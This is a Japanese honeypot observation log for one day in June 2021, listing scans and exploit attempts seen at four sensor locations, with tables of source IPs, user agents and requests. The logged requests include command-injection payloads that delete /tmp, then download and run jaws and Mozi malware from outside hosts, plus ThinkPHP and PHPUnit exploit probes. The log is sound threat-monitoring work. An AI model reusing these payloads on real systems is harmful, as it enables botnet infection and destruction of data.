ハニーポット(仮) 観測記録 2021/06/13分です。
特徴
共通
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為
Location:JP
DrayTek製品の脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
XTCによるスキャン行為
/.envへのスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 65.21.189.187/jaws; sh /tmp/jaws
Location:US
GPONルータの脆弱性を狙うアクセス
gbrmssによるスキャン行為
/.envへのスキャン行為
Apache Solrへのスキャン行為
WordPressへのスキャン行為
104[.]149[.]194[.]78に関する不正通信
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 65.21.189.187/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget http[:]//182[.]119[.]17[.]89:51594/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:UK
JBossの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
WordPressへのスキャン行為
104[.]149[.]194[.]78に関する不正通信
を確認しました。
Location:SG
GPONルータの脆弱性を狙うアクセス
/.envへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
WordPressへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。
他
アクセス数推移
JP:総アクセス数:151 (前日比:+94)
US:総アクセス数:48 (前日比:+12)
UK:総アクセス数:38 (前日比:+10)
SG:総アクセス数:33 (前日比:+4)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 2.57.122.53 | Romania |
| 1 | 27.211.209.176 | China |
| 1 | 40.76.50.95 | United States |
| 22 | 45.146.165.123 | Russia |
| 8 | 51.15.225.75 | France |
| 1 | 59.99.205.44 | India |
| 1 | 60.243.183.131 | India |
| 101 | 67.249.4.192 | United States |
| 1 | 74.102.39.43 | United States |
| 2 | 91.194.55.194 | Turkey |
| 1 | 113.231.160.142 | China |
| 1 | 120.82.169.61 | China |
| 1 | 125.43.75.208 | China |
| 1 | 135.125.244.48 | France |
| 5 | 135.125.246.189 | France |
| 1 | 167.172.183.253 | United States |
| 1 | 178.175.119.142 | Albania |
| 1 | 180.149.125.175 | Mongolia |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 6 | - |
| 1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
| 101 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
| 22 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko |
| 9 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 8 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0 |
| 1 | RestSharp/106.11.7.0 |
| 1 | XTC |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | CONNECT | pv[.]sohu[.]com/:443 | HTTP/1.1 |
| 9 | GET | /.env | HTTP/1.1 |
| 2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 2 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /?d0xing-cachebuster=180640c37df4f635fe | HTTP/1.1 |
| 1 | GET | /?d0xing-cachebuster=65b360314068a74269 | HTTP/1.1 |
| 2 | GET | /?d0xing-cachebuster=9bee678d2f8fd9e307 | HTTP/1.1 |
| 1 | GET | /?d0xing-cachebuster=a41f22f4dcfe52a2f8 | HTTP/1.1 |
| 1 | GET | /?d0xing-cachebuster=ca8de681ff6039bb0a | HTTP/1.1 |
| 1 | GET | /?d0xing-cachebuster=d40fbd5d7e5d5463e1 | HTTP/1.1 |
| 1 | GET | /?d0xing-cachebuster=e833bb7259cf77c16b | HTTP/1.1 |
| 2 | GET | /_ignition/execute-solution | HTTP/1.1 |
| 2 | GET | /console/ | HTTP/1.1 |
| 1 | GET | /images/Nxrs4tAtO/HCw4_2FQ7o69dmQEodXU/_2Fua56jJgWqt8tN1Tx/0M9Tus5G1nAOe_2BJflcrm/2nz3T7AxG_2Fd/YnZ7Cn6A/zq1HlKYZhiFyQLgflmvIbb1/yQL2MK3UaK/00uQsiMnxrcs4C9gN/xpGuwRLuq6tH/7YwEr.avi | HTTP/1.1 |
| 2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
| 101 | GET | /phpmyadmin/ | HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//125[.]43[.]75[.]208:47881/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//60[.]243[.]183[.]131:46380/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ 65.21.189.187/jaws;sh+/tmp/jaws | |
| 2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /stalker_portal/server/tools/auth_simple.php | HTTP/1.1 |
| 2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 2 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
| 1 | POST | /.env | HTTP/1.1 |
| 2 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
| 3 | POST | /HNAP1/ | HTTP/1.0 |
| 2 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 1 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
| 2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 1.36.124.230 | Hong Kong |
| 1 | 14.160.177.250 | Vietnam |
| 6 | 23.106.215.220 | United States |
| 1 | 45.63.60.133 | United States |
| 22 | 45.146.165.123 | Russia |
| 2 | 51.210.48.148 | France |
| 1 | 54.162.210.32 | United States |
| 1 | 58.248.193.84 | China |
| 1 | 62.210.88.212 | France |
| 1 | 64.225.98.181 | United States |
| 1 | 77.247.108.42 | Belize |
| 1 | 135.125.246.110 | France |
| 1 | 139.162.145.250 | Netherlands |
| 1 | 167.71.14.11 | United States |
| 1 | 175.4.210.242 | China |
| 1 | 180.149.125.175 | Mongolia |
| 1 | 182.119.17.89 | China |
| 1 | 185.117.2.115 | Germany |
| 3 | 212.47.244.68 | France |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 6 | - |
| 1 | Hello, World |
| 1 | Hello, world |
| 1 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) |
| 2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6; rv:52.2.1) Gecko/20100101 Firefox/52.2.1 |
| 6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 |
| 22 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko |
| 6 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | gbrmss/7.29.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | \x16\x03\x01 | ||
| 1 | CONNECT | www[.]bing[.]com/:443 | HTTP/1.1 |
| 6 | GET | /.env | HTTP/1.1 |
| 1 | GET | /3000D00E0000FFFF3F0031313744373731343634304537353046007A7A7A7A7A7A7A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000008047A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000 | HTTP/1.1 |
| 2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 2 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 2 | GET | /_ignition/execute-solution | HTTP/1.1 |
| 1 | GET | /cms/wp-includes/wlwmanifest.xml | HTTP/1.1 |
| 2 | GET | /console/ | HTTP/1.1 |
| 1 | GET | /images/Nxrs4tAtO/HCw4_2FQ7o69dmQEodXU/_2Fua56jJgWqt8tN1Tx/0M9Tus5G1nAOe_2BJflcrm/2nz3T7AxG_2Fd/YnZ7Cn6A/zq1HlKYZhiFyQLgflmvIbb1/yQL2MK3UaK/00uQsiMnxrcs4C9gN/xpGuwRLuq6tH/7YwEr.avi | HTTP/1.1 |
| 2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
| 1 | GET | /maint/modules/home/index.php?lang=english | curl%20-s%2077.247.108.42/g/%3FshFrPbN0%3DIPAPY%7Csh&||x|HTTP/1.0 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ 65.21.189.187/jaws;sh+/tmp/jaws | |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//182[.]119[.]17[.]89:51594/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
| 1 | GET | /site/wp-includes/wlwmanifest.xml | HTTP/1.1 |
| 2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /stalker_portal/server/tools/auth_simple.php | HTTP/1.1 |
| 2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | GET | /wordpress/wp-includes/wlwmanifest.xml | HTTP/1.1 |
| 2 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
| 1 | GET | /wp-includes/wlwmanifest.xml | HTTP/1.1 |
| 1 | GET | /wp/wp-includes/wlwmanifest.xml | HTTP/1.1 |
| 1 | GET | /xmlrpc.php?rsd | HTTP/1.1 |
| 1 | GET | http[:]//104[.]149[.]194[.]78:80/ | HTTP/1.1 |
| 1 | GET | http[:]//www[.]bing[.]com/ | HTTP/1.1 |
| 2 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
| 1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
| 2 | POST | /HNAP1/ | HTTP/1.0 |
| 2 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | http[:]//grzej[.]xyz/fd138991aa63df39f61df7ad4889852e0efdfd8a03bb64c22357d2f1ac121ea6bd28b66f7e6e0e9ace38a95bf482ade2b1651bcc982a8575ebc129fe2f379d6a362e77095797ee05020186894f3f005570ed2556ba5d672689a108db22b65fca | HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 40.121.11.29 | United States |
| 22 | 45.146.165.123 | Russia |
| 1 | 62.210.88.212 | France |
| 1 | 108.224.129.221 | United States |
| 1 | 139.162.145.250 | Netherlands |
| 1 | 167.99.140.93 | United States |
| 8 | 171.6.143.89 | Thailand |
| 1 | 172.105.89.161 | United States |
| 1 | 178.62.199.239 | United States |
| 1 | 180.149.125.175 | Mongolia |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 3 | - |
| 1 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) |
| 8 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0 |
| 22 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko |
| 2 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | \x16\x03\x01 | ||
| 2 | GET | /.env | HTTP/1.1 |
| 1 | GET | /0bef | HTTP/1.0 |
| 1 | GET | /3000D00E0000FFFF3F0031313744373731343634304537353046007A7A7A7A7A7A7A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000008047A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000 | HTTP/1.1 |
| 2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 2 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=qbLUZhIF | HTTP/1.1 |
| 2 | GET | /_ignition/execute-solution | HTTP/1.1 |
| 2 | GET | /console/ | HTTP/1.1 |
| 1 | GET | /images/Nxrs4tAtO/HCw4_2FQ7o69dmQEodXU/_2Fua56jJgWqt8tN1Tx/0M9Tus5G1nAOe_2BJflcrm/2nz3T7AxG_2Fd/YnZ7Cn6A/zq1HlKYZhiFyQLgflmvIbb1/yQL2MK3UaK/00uQsiMnxrcs4C9gN/xpGuwRLuq6tH/7YwEr.avi | HTTP/1.1 |
| 2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
| 1 | GET | /invoker/readonly | HTTP/1.1 |
| 1 | GET | /jenkins/login | HTTP/1.1 |
| 1 | GET | /login | HTTP/1.1 |
| 1 | GET | /manager/html | HTTP/1.1 |
| 2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /stalker_portal/server/tools/auth_simple.php | HTTP/1.1 |
| 2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 2 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
| 1 | GET | /wp-login.php | HTTP/1.1 |
| 1 | GET | http[:]//104[.]149[.]194[.]78:80/ | HTTP/1.1 |
| 2 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
| 1 | POST | /_ignition/execute-solution | HTTP/1.1 |
| 2 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 3 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 3.92.88.76 | United States |
| 1 | 20.75.49.253 | United States |
| 1 | 40.75.90.122 | United States |
| 6 | 45.144.225.135 | Netherlands |
| 11 | 45.146.165.123 | Russia |
| 1 | 64.225.101.151 | United States |
| 1 | 81.246.173.26 | Belgium |
| 1 | 84.38.133.120 | Belize |
| 1 | 102.68.110.65 | Nigeria |
| 7 | 165.22.209.245 | United States |
| 1 | 167.99.212.33 | United States |
| 1 | 178.175.115.22 | Albania |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 6 | - |
| 1 | Hello, World |
| 1 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) |
| 1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
| 7 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0 |
| 11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko |
| 5 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 6 | GET | /.env | HTTP/1.1 |
| 1 | GET | //MyAdmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //myadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //phpMyAdmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //phpmyadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //pma/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /3000D00E0000FFFF3F0031313744373731343634304537353046007A7A7A7A7A7A7A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000008047A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000 | HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=__HelloThinkPHP | HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution | HTTP/1.1 |
| 1 | GET | /console/ | HTTP/1.1 |
| 1 | GET | /images/Nxrs4tAtO/HCw4_2FQ7o69dmQEodXU/_2Fua56jJgWqt8tN1Tx/0M9Tus5G1nAOe_2BJflcrm/2nz3T7AxG_2Fd/YnZ7Cn6A/zq1HlKYZhiFyQLgflmvIbb1/yQL2MK3UaK/00uQsiMnxrcs4C9gN/xpGuwRLuq6tH/7YwEr.avi | HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
| 1 | GET | /jenkins/login | HTTP/1.1 |
| 1 | GET | /login | HTTP/1.1 |
| 1 | GET | /manager/html | HTTP/1.1 |
| 1 | GET | /muieblackcat | HTTP/1.1 |
| 1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
| 1 | GET | /wp-login.php | HTTP/1.1 |
| 1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
| 1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
| 1 | POST | /_ignition/execute-solution | HTTP/1.1 |
| 1 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
